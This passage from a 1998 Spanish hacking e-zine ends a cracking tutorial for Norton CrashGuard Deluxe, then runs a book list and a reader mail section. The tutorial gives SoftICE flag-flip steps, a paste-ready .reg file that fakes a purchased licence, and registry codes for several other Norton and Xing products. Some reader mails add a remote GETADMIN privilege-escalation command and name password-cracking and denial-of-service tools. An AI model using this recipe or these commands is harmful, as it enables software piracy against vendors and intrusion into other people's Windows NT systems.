al bloque cs:00406752 E859100000 call 004077B0 <- Bloque anterior cs:00406757 66392D04254300 cmp [00432504], bp <- Comparacion Interesante cs:0040675E 0F84F4010000 je 00406958 cs:00406764 BF34254300 mov edi, 00432534 Cuando nos encontremos sobre la direccion cs:0040675E cambiamos el flag de cero que estara activada (Z) y la colocamos a desactivada (z). Ahora el programa seguira en cs:00406764. Pulsemos F5 y veamos que ocurre. Ha aparecido una ventana que nos dice que esperemos mientras nuestro programa esta siendo preparado (Please wait while your software is being prepared). Al fin, se "PREPARA EL SOFTWARE" Nota: Si el proceso anterior se repite muchas veces conviene que cerremos todos los programas que tengamos activo e incluso el mismo Norton Crashguard que tengamos en la barra de tareas. Una vez completado este proceso habremos comprado virtualmente el Norton crashguard Deluxe. Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y LICENSE.xxxxxx (numeros de licencia) Este proceso realizado en tiempo real con el Softice no trae ningun problema pero a la hora de hacer los parches no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO TIENE SOLUCION. MODIFICANDO EL REGISTRO Usaremos una herramienta muy util para los crackers el programa Regmonitor (si no lo tienes consiguelo). Observamos unas variables que lee el programa (no registrado) al principio y tenemos: HKCR\ultxfile\Format\MSHAEZDC\write /* Esta nos suena */ HKCR\ultxfile\Format\MSHAEZDC\xlate HKCR\ultxfile\Format\MSHAEZDC\open /* Esta nos suena*/ Bien, basta comparar los valores antes y despues de "preparar" el software, para darse cuenta que la unica modificacion la realiza en open. Cuando esta registrado su valor es: HKEY_CLASSES_ROOT \ultxfile\Format\MSHAEZDC\open 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00 08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00 Esta es la forma en que se comunica al resto de utilidades que la compra ya ha tenido exito. Y YA ESTA, basta con introducir este valor en el registro para que quede registrado el Norton CrashGuard Deluxe 3.0 MSHAEZDC corresponde al programa en cuestion a comprar. Usando el regmonitor vemos que clave busca el programa a desproteger y anotamos el codigo (MSHAEZDC). Esta tactica se ha probado con exito con las siguientes aplicaciones protegidas por la compa¤ia Release Software Corporation : Norton utilities, Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder, Creando un archivo de registro ya tenemos hecho un crack no destructivo ya que no modifica ningun ejecutable. ----------------------------------- Cortar por aqui -------------------------- REGEDIT4 ; (c) ESTADO+PORCINO 1998 ; Modificacion de registro para Norton Crash Guard Deluxe ; Mr.Red & otras hierbas ; [HKEY_CLASSES_ROOT\ultxfile\Format\MSHAEZDC] "open"=hex:00,00,00,00,00,0 ffb 0,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00 ,00,00,00,00,00,00,00,00,00,00 ----------------------------------- Cortar por aqui -------------------------- Para los demas programas que usan esta proteccion tenemos: Xing MPEG Encoder codigo -> MSHVEMAV Norton Utilities codigo -> MSHVEM0E Norton Unisntaller codigo -> MSHW2EHL Bueno ha sido largo pero ha merecido la pena. MORALEJA: Si quieres poner una puerta, procura que no sea de papel. Es el colmo de la incompetencia. Confias la venta de tu producto a un empresa que proporciona una proteccion ridicula que no vende tu producto si no que practicamente lo regala. Por que no invertir la millonada que Symantec habra pagado a Release Software Corporation encontrar a unos buenos programadores en ensamblador que hicieran una proteccion decente. Ademas, esta compa¤aa protege y vende productos de mas empresas a parte de Symantec. Basta pasarse por su web http://www.releasesoft.com y comprobar lo orgullosos que estan de sus clientes. Realmente, no creo que esta compa¤ia dure mucho. La importancia de este articulo radica en que se ha conseguido solventar con exito la proteccion de una casa de Software dedicada a proteger y vender. Quedan a nuestros pies cientos de programas, con una proteccion de papel, gracias a la incompetencia de una avariciosa compa¤ia. Mejor seria que diera los programas gratis, y de dejara de hacer el ridiculo. Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino@hotmail.com Recordad bebed de la fuente, buscad a +ORC en la red. Mr_PinK & WKT ( WHISKEY KON TEKILA ) http://wkt.home.ml.org http://wkt.mypage.org <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ³ Un poco de cultura: Libros ³ \----------------------------------/ Bien, en primer lugar, esta va a ser, digamos, la nueva seccion del e-zine. Aqui, a partir de ahora y en adelante a los siguientes e-zines, comentaremos distintos titulos de libros relacionados con el tema, y por supuesto donde podreis encontrarlos y su precio (si es q se sabe :o). Dicho esto, vamos a empezar: - Cyberpunk, outlaws and hackers on the computer frontier. Katie Hafner and John Markoff. Simon & Shuster, New York 1995. Libro de lectura obligada, engloba todos los casos mas conocidos sobre el underground, desde Kevin Mitnick hasta el Hacker de Hannover. De momento este libro solo lo he encontrado en ingles :o(, pero bueno, podeis buscarlo en español tambien, mirar por su ISBN :0-684-81862-0. Unas 1.500 a 2.000 pts - Hackers: Heroes of the computer revolution. Steven Levy. Dell Books, New York, 1994. Otro de los grandes libros sobre el tema. Steven Levy es un autor expe- rimentado sobre el tema de los ordenadores, este es su tercer libro. Tambi- en en ingles, pero como ya dije antes, puedes buscarlo por su ISBN :0-385- 31210-5. 1.500 pelas. - Hacker Crackdown, The: Law and Disorder on the Electronic Frontier. Bruce Sterling. Bantman Books, 1993. Uno de los libros mas famosos sobre el mundo de los hackers. En este libro, el autor examina el pasado, presente y futuro del underground, desde sus principios, pasando por MoD y LoD hasta, de nuevo, Mitnick. Otro mas en ingles. Su ISBN: 0-553-56370-X. - Huevo del Cuco, El. Clifford Stoll, 1990. Que decir de uno de los libros mas famosos sobre el underground. Aqui tie- nes toda la historia del conocido Hacker de Hannover, toda una autentica historia. ISBN: 0-671-72688-9. Sobre las 2.000 pelas. - Maximun Security: A Hacker's Guide to protecting your internet site and network. Anonymous, SAMS Net, Indianapolis, 1997. Este es uno de los libros "tecnicos" mas famosos y utiles q conozco. En es- te libro encontraras todo lo necesario para aprender sobre seguridad, desde el usuario mas principiante hasta el administrador de un sistema, aqui tie- nes absolutamente todas las respuestas a tus preguntas. Libro escrito por un hacker ya experimentado. El libro incluye el ultimo manifiesto escrito por The Mentor, y una de las mejores citas sobre el autor que he leido hasta ahora. La cita dice asi: "El autor de este libro vive felizmente en el sur de California, con un Sun SPARCStation, un IBM RS-6000, dos Pentium, varios MicroVax, y su mujer" :o), bueno, dejemonos de co¤as, aqui esta su ISBN: 1-57521-268-4. Altamente recomendado :o). Un poco carillo, entre 7.500 y 10.000 ptas. depende el sitio donde lo compres. - Masters of Deception: The gang that ruled cyberspace. Michelle Stalla & Josua Quitter, Harper Collins, 1995. Libro imprescindible si quieres conocer la autentica historia sobre los MoD. Este libro se basa en los pasos seguidos por Phiber Optik (aka Mark Abene) y sobre sus andanzas por Legion of Doom, 2600 y la fundacion de Masters of Deception. Muy Bueno y entretenido. ISBN: 0-060-92694-5. 1.500 ptas. - Mundo Digital, Un. Nicholas Negroponte. RandomHouse, 1995. Un libro muy entretenido, escrito por un gran autor y gran estudioso de los ordenadores y a lo que de tecnologia se refiere. Este libro lo hay en espa- ¤ol, lo que no se es la editorial fijo, asin que vuelve a buscar por su ISBN 0-679-43919-6. Sobre 2.000 pelas. - Takedown.Tsutomu Shimomura, John Markoff. Hyperion, 1996. Otro de los grandes libros sobre los grandes del Hack, en este caso se cuenta como se capturo a Kevin Mitnick. Este libro esta escrito por el autor de su captura, muy entretenido. ISBN: 0-786-88913-6. Sobre las 2.000 pelas. - UNIX in a Nutshell: A Desktop Quick Reference for Solaris V and 2.0. Daniel Gilly. O'Reilly & Associates, 1992. Trannnnnnnnquis, aunque parezca que el librito ta un poco anticuado, no pasa na, acaba de salir la segunda edicion actualizada para el SVR4. Uno de los libros mas famosos para empezar a conocer este sistema operativo. 2.000 ptas. ISBN: 1-585-92001-5 - UNIX Unleashed. Sams Development Team. SAMS Publishing, Indianapolis 1994. Acojonante, es la unica palabra que se me ocurre para describir este pedazo de libro. Aqui encontraras todo lo que necesites saber del SVR4. Escrito por gurus del UNIX. ISBN: 0-672-30402-3. Sobre unas 7.500 a 8.000 ptas. Bueno, de momento esto es todo lo que os puedo ofrecer de libros, pero no os preocupeis, el proximo e-zine, mas :o). mac_crack@usa.net <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ < EL LECTOR OPINA > ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Otra vez ya estamos con vuestra seccion, pero os pedimos que penseis claramente lo que nos escribiis, ya que sige habiendo mucho desaprensivo que solo quiere entrar en computadoras ajenas y similares, esto es una tonteria, por lo que no hace falta que escribais }:-) Al igual que tampoco hace falta que escribas un mail solicitando que os demos clases de hack, menuda tonteria. Okis? Por otro lado esta seccion esta mejorando, ya que por fin los lectores se empiezan a contestar entre ellos, y esto es lo que precisamente pretendiamos con esta seccion y nos alegra mucho ;-) y ya basta de rollos y que comienze el mail de nuestros fantasticos lectores. <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: PoP To: jjf_team@usa.net Subject: novato...... en IRC soy ^PoP^ :) Hace un mes, mas o menos, me pasaron vuestra web, y me parecio bueniiiiiiisima. Estoy leyendo todos los txt, incluidos los e-zines(que es muy buena..... sera pq es la primera ke leo :), y ademas es baratita... jeje, pero de muchas cosas nomentero... Es por esto ke os "maileo" para sugerir ke pongais en el e-zine o en kualkier otro sitio(kreeme ke lo buskare) un diccionario en el ke vengan palabras teknikas ya ke eso ayudaria mucho. Estoy komo loko por hacer todo eso de lo ke hablais en el e-zine(mi novia dice ke kiero mas a mi PC ke a ella :) ) pero veo ke es totalmente necesario tener al menos un linux, controlar el lenguaje C y sobre todo saber komo se kompila. Bueno el kaso es ke me veo inkapaz de acceder a internet por otro S.O. ke no sea el Win95 (o NT ke es lo mismo a mi parecer), ya ke intente instalar linux (la version s.u.S.e 5.0 y no me dio muy buen resultad( a parte de no entender ni papa) y por eso os pido ayuda... Me gustaria (si no es mucho pedir) ke me sugirierais ke version de linux instalar(tengo la suse 5.1 y la red hat 5.0, aunke kompraria otra si hace falta) para poder iniciarme (y algun tipo de informacion sobre los comandos de linux). Ya he preguntado por ahi y me ha dicho ke pruebe kon la SlackWare... . Pero sobre todo un libro para aprender lenguaje C y saber kompilar, para pardillos komo yo ke empiezan del zero_absoluto( en lo ke a lenguaje C se refiere). Enga, no os doy mas la tabarra.... solo felicitaros por la pag y por el e-zine (sois mu wuenos :) ) y seguid asi! Accedeis a ayudar y es dificil enkontrar ayuda sobre hack para los novatos komo yo ke kieren llegar ha ser komo vusotros... y olvidar el w95 de una pu¤etera vez! Espero vuestro mail y......... Muxxxxxxxas Gracias! Atentamente.... Jose Antonio Lopez (Murcia) <------> [ Thx, Hombre lo referente a las versiones linux eso depende un poco de tus gustos, por ejemplo: - Red Hat or SuSe = Facil de instalar y mantener. - Slackware = Muy buena. - Debian = Enfocada a los programadores. Nuestro consejo es que empiezes con RH 5.0 o SuSe que son faciles y despues pruebes con Slackware o Debian. Como dices bien en tu mail es aconsejable que pilles algun libro sobre Linux y C. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Fri, 24 Apr 1998 19:52:41 -0700 (PDT) From: hardbody@xxxxxxxxxxxxxx Subject: help Se¤or Conde Vampiro Por favor, ayudeme, yo lo que mas quiero en la vida es ser hacker, me fascina la idea de entrar a otro computador sin que este se de cuenta, estoy en segundo semestre de Ingenieria de Sistemas y tengo 17 a¤os. Por favor, envieme su respuesta lo mas pronto posible. Atte Zeus <------> [ Pues con esa filosofia que tienes no llegaras muy lejos que digamos, ya que el hacking no consiste en entrar en computadoras ajenas y que el due¤o no se de cuenta. Haver si lees este ezine con mas claridad. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sun, 26 Apr 1998 17:04:13 GMT From: "Ferran Fontcuberta ( Vs )" To: jjf_team@usa.net Subject: Pos vaya ;-) Pues... una sugerencia, podrias comprimir la revista en zip o gz o... ya que okupa menos y se tarda menos en bajar (aunke tengan el mismo tama¤o) Tanxs. Vs versus@xxxxxxxxxxxxxx com <------> [ No me digas!!, pero como ya hemos dicho en alguna ocasion no queremos comprimirla ya que asi es llegar y leer. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Thu, 30 Apr 1998 12:24:38 GMT From: "Francisco Rodriguez Casal (Pac\4s)" To: conde_vampiro@usa.net Subject: Copiar diskettes Hola: Os queria pedir ayuda. Quiero copiar un diskette que esta protegido contra copia. Se trata de un programa reciente que incluye un diskette llave (ellos le llaman TOKEN) creo que la proteccion consiste en un error de sector intencionado en la pista 28 cara 1 el cual no es reproducido en el disco destino pot los copiones. He intentado copiar el diskette con varios copiones y no lo he conseguido. Tampoco controlo mucho del tema. Por supuesto, no pretendo piratear ningun programa, lo que intento es hacer una copia de seguridad de dicho disquete ya que si se da¤a pierdo la licencia. ;-) Gracias. Un saludo. __________________________________________________________ Universidad de La Coru¤a Servicios Informaticos de Gestion Francisco Rodriguez Casal Email: pacs@xxxxxxxxxxxxxx __________________________________________________________ <------> [ Un buen copion deberia ser capaz de copiarlo, por lo que deberias seguir buscando alguno que satisfaga tus necesidades. Ademas siempre puedes aplicar "coding rulez" o sea que como crees saber donde esta la proteccion la puedes intentar anular. Pasate por la seccion de crack, para pillar tools para este trabajo. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sat, 02 May 1998 10:27:38 GMT From: Subject: CONSULTA HOLA J.J.F. SOY FEAR, SUPONGO QUE NO SABEIS QUIEN SOY (SEGURO QUE NO). BUENO, OS PODRIA DECIR QUE SOY UN USUARIO DE INTERNET A QUIEN LE GUSTARIA APRENDER A SER UN HACKER, NO SE SI ESO ES POSIBLE ASI COMO YO LO ESTOY PLANTEANDO, PERO ESPERO QUE PODAIS AYUDARME, DANDOME CONSEJOS Y EXPLICANDOME LAS COSAS QUE DEBO DE HACER, ME REFIERO A QUE VOSOTROS SEREAIS MIS PROFESORES Y YO VUESTRO FIEL ALUMNO. SEGURO QUE RECIBIREIS CIENTOS DE MAIL'S COMO ESTE, PERO YO OS JURO SI ME ENSAÑAIS, VAIS A PODER ESTAR ORGULLOSOS DE MI. DE TODAS FORMAS, ME GUSTARIA FELICITAROS POR LA GRAN PAGINA QUE TENEIS, SEGURO QUE SIRVE DE AYUDA A MUCHAS PERSONAS Y POR ULTIMO ME GUSTARIA QUE AUNQUE PASAEIS DE MI ME ACLARARAIS UNA DUDA: - EN VUESTRA PAGINA HAY UN APARTADO QUE EXPLICA COMO BLOQUEAR UN ORDENADOR A TRAVES DE UN CHAT. YO LO INTENTE HACER DE ESTA FORMA: 1.- ME CONECEÉ AL BUSCADOR OLE. 2.- LE DI AL APARTADO DE CHAT'S. 3.- ESCOGI EL APARTADO "DIVERSION" 4.- ESCOGI EN CANAL "AMOR" 5.- UNA VEZ DENTRO, HABRO EL CANAL PRIVADO DE OTRO USUARIO. 6.- HABLE UN POCO CON EL Y CUANDO PASÓ DE MI, ESCRIBI LO QUE VOSOTROS DECIAIS QUE HABIA QUE ESCRIBIR O SEA ESTO 7.- LE DI AL INTRO Y.... NO PASÓ ABSOLUTAMENTE NADA, TODO LO QUE HABIA ESCRITO APARECIÓ EN EL CANAL PRIVADO, Y EL TIO ME PREGUNTO QUE PORQUE HABIA PUESTO ESO. BUENO ME GUSTARIA QUE SI PODEIS Y QUEREIS ME DIJERAIS QUE ES LO QUE HE HECHO MAL, O LO QUE NO HE HECHO. GRACIAS. EMAIL= ardarj@xxxxxxxxxxxxxx <------> [ Como ya hemos dicho, no damos clases privadas ni nada por el estilo. Nuestro consejo que es estudies mucho todo lo que puedas. Parece que hay alguna web que ense¤an a escribirnos solicitando clases porque todos escribiis lo mismo!!!!. Si hubieras leido el txt con mas cuidado, verias que pone que no siempre funciona debido al CGI de los Web Chat, por eso antes de ejecutar el script, escribe '<' para saber si funciona o no. Lo mas aconsejable es volverse a leer la guia. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: To: mack_crack@usa.net Subject: [JAU....] Hola loco.... La verdad es ke iba a encriptarlo con pgp pero para decir esta tonteria paso.... Solamente era para decirte ke tu güeb es una de las ke hay ke ir viniendo cada x tiempo para ver las novedades y tal y pascual....por lo ke en mi opinion, una mas, deberia ser muy dinamica y ligera y asi daaria gusto en venir...bla bla bla y mas bla.... Resumiendo mucho ke no tengo ganas de enrollarme: el contenido de la güeb...muy OK pero macho......DESCARGALA DE JAVA KE SE HACE ETERNO!!!.... A lo mejor un poco directo pero claro.....ok?... por cierto, a ver si podeis re-editar el articulo de Nobody sobre el netstat y nbtstat ke la pe¤a me pregunta siempre lo mismo y asi, en vez de enrollarme, le paso el articulo ese...os lo digo a vosotros porke creo ke teneis contacto....ok? y ya os enviare algo un dia ke tenga un minimo de ganas ...... cuidaros y no cerreis los dos ojos al dormir.....;) contestad en: quasarr@xxxxxxxxxxxxxx ostias no he utilizao el remailer...psss...da igual...lo dicho.... QuasaR .......... progressing ressing <------> [ Hi Pues si, nuestras webs son de las q cada POCO tiempo se actualizan con mas ficheros, links y si, tb java. Ya se q se hace eterno, pero si te has leido la segunda pantalla de nuestra web pone entrada CON JAVA y entrada SIN JAVA, o sea q en lo referente a tu consejo de descargarla de java, mmmm, paso, ya he tenido q hacer dos entradas, coje la q mas te convenga ;-). En lo refererente al articulo de Nobody, ya le mandaremos un mail a ver q dice. Byezz ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Dany" Subject: Win NT Hola, Estoy buscando Caballos de Troya. Tanto el codigo ( Para Vbasic o Pascal ) como los programas ya hechos. Es para Win NT, para tomar las claves. Alguna Sugerencia??? Dany, CodeBracker en el IRC Hispano <------> [ Pues de eso alguna cosa hay, lo mejor que puedes hacer es visitar alguna web sobre Hack NT y ya pillaras tools. Para Vbasic si que hemos visto pero en pacal nop. Pillate el winsock caballo de troya. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Wed, 06 May 1998 09:25:01 GMT From: "Sanye" Subject: hackers JJf Hackers me gustaria recibir informacion sobre los programas y pasos que tendria que seguir para acceder a sistemas remotos como los ordenadores de mi amigos por ejemplo, o servidores de red de empresas o cosas asin Te pido ayuda ya que seguro que tu sabes cuales son los programas y tambien los pasos a seguir. ea3ckx@xxxxxxxxxxxxxx <------> [ hhuummmm, creo que para eso esta este ezine o sea que lee. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Mon, 11 May 1998 10:47:55 GMT From: chipiona To: "'silicio@xxxxxxxxxxxxxx" Cc: "'zen@xxxxxxxxxxxxxx" Subject: SOLICITO_AYUDA, POR_FAVOR Imploro a quien me pueda ayudar, que me eche un cble en esto. Ya se que como indicais en vuestras paginas la mayoria de vosotros, esto es ilegal y solo lo mostrais a efectos educativos, y bajo la responsabilidad del que lo acepte. YO ACEPTO ESA RESPONSABILIDAD. Os explicare el problema. Tengo una serie de programas demo de gestion de clinica veterinaria. Todos estan limitados de alguna forma, la mayoria de llos en la cantidad de clientes que les puedo meter (maximo de 25 clientes), y otro que esta limitado por la fecha (1/4/98, que ya tengo controlada mediante el DATE CRACKER), pero tambien esta limitada la base de datos indicandome cuando craqueo la fecha que no puede aceptar el registro porque es superior a los seis meses de evaluacion. ¨Hay alguna forma o programa que me podais indicar para eliminar estas limitaciones?. Conque me funcione uno de los programas me avio. Mi nombre es Jose Javier y mi direccion de correo es como veis CHIPIONA@xxxxxxxxxxxxxx y no os asusteis del nombre porque es el correo de la oficina donde curro. GRACIAS A TODOSS <------> [ Hombre, para empezar son programas demos y esta muy mal por tu parte que los uses para obtener beneficio economico, como estas haciendo. Lo mejor que puedes hacer para crackearlos, es buscar algun crack especifico para el programa en cuestion. Pasa por nuestra seccion de crack para pillar alguna tool. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Thu, 07 May 1998 05:13:14 GMT From: Marco Demonte To: conde_vampiro@usa.net Subject: mmmm.. pena Sr. Vampiro ;-) Se que el tiempo que ocupara en leer esto es tiemo perdido pero no hay otra manera para aprender..... Como se comienza a crackear.. algun documento para empezar o algo asi.. Ya que estoy interesado en eso por que tengo una lista ... Le comento que soy de Mexico y hace un par de a¤os estuve estudiando mucho respecto al phreaking , aqui en Mexico rompiamos con 2600hz y utilizaba protocolo ccitt r2 por lada 800 nacional, era una maravilla, tambien con 2600hz para lada 800 internacional y tambein funcionaba.... Si te interesa podria pasarte algunos tips que en otros paises podrian funionar como la intervencion de llamadas en sistemas ccirr r2.. Tambien se algo de cululares.... Mil gracias por tu tiempo Marco <------> [ A que esperas!!!! envia los trucos al ezine ;-) y ya sabes escribe algun articulo de phreak. Para crackear hay varios documentos de como comenzar. Pasate por nuestro web ya que alguno hay disponible. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 12 May 1998 17:40:37 GMT From: Anonimo To: jjf_team@usa.net Subject: {CyBoRg}, SHG Hola a todos me parece cojonuda vuestra revista, escribo este mail para contestar un mail que lei sobre una que decia que querias cosas de NT, y que el GETADMIN no funciona remotamente. Bueno lo primero, el getadmin funciona remotamente y lo he probado y va, porque no pruebas hacer lo siguiente desde MS.DOS: GETADMIN \\ip\nombre usuario No se habra ocurrido utilizar el getadmin con el usuario invitado porque no va con ese usuario. Cosas de hack de NT, nunca se te ha ocurrido explorar los recursos compartidos de NT que trae ocultos,, ah pero eso no lo sabiais, :))))). Hay una buena utilidad por ahi que se llama NAT que os ayudara para el NBTSTAT famoso, ya que le podreis poner un dicionario y lo pasa. Que mas utilizar el l0pth, va genial si no tiene instalado el SP3. Hay muchas cosillas. Bueno otro asunto comentaba de hacer taeardrop, land, etc en windows, pues gente es posible hacerlo, hay un sitio que tiene el programilla. *****Censurad la url si quereis ****** www.aggressor.net Bueno gente me despido y o quiero dar mas la tabarra. Hasta otra. Por cierto cuando metamos los 30 megas de nuestra web, pondremos un link a vuestro zine, Ad10, bye ++++++++++++++++ {CyBoRg} SHG..... ++++++++++++++++ <------> [ Por fin, los propios lectores se contestan entre si :))) Okis, ya nos pasaras el url del grupo y nosotros tb os pondremos un link. Thx's por los cumplidos y nos gusta que otros grupos nos saluden, ya sabeis que podeis escribir algun arti, estaremos encantados de publicarlo. Saludos de - J.J.F. / HACKERS TEAM - ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Fco. de Angel Fernandez-Pacheco" Subject: Re: E-Zine Hola!!! Lo primero es felcitasros por el E-Zine que esta muy guapo, luego otra cosa es si puedo colaborar en traducciones de textos en vuestra pagina. Sludos. DataCrack <------> [ Pues ya sabes, traduce lo que quieras y lo envias al buzon y lo pondremos en el ezine :), la gente nos pide traducciones de articulos de pkreak, o sea que ya te hemos dado trabajillo. Esta genial que querais colaborar, cuantos mas, mejor para todos. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Thu, 14 May 1998 03:00:02 GMT From: Ayala To: conde_vampiro@usa.net Subject: (sin asunto) hola, estoy buscando a un maestro, alguien que pueda iniciarme en la entrada a sistemas informaticos. Si puedes ayudarme, hazmelo saber, gracias. <------> [ Ya estamos como siempre!!, que no ayudamos a la gente para que entre en los sistemas ajenos y tampoco damos clases privadas, okis ? ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Wed, 20 May 1998 02:37:32 GMT From: "Arturo Villal\sn Villa" To: jjf_team@usa.net Subject: Problemas con algunas de sus secciones Tengo problemas al intentar bajar algunos de los archivos de su pagina estos son: Seccisn HACK Novell (no se puede obtener ninguna utileria) Utilidades de Encripcisn (no se puede obtener ninguna utileria) Utilidades Network-Hacking (no se puede obtener ninguna utileria) ? Que es lo que esta pasando en sus servidores o cual es la razsn de este problema ? ? Tienen una direccisn FTP para obtener mas rapidamente estas utilerias asm como los archivos de Virus Informaticos, de ser asm, podrman darme la direccisn para tomarlos ? Saludos <------> [ Es normal que siempre haya algun enlace que no este disponible, ya que el web es muy dinamico, ademas que algunas de esas secciones que mencionas hay un MENSAJE QUE PONE QUE DE MOMENTO ESTA OFF-LINE , pero en fin ... Las razones son muy variadas, por desgracia, pero procuramos estar siempre con lo mejor y mas actualizado ;-) Sobre virus tienes la seccion de virus que seguro te gustara. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 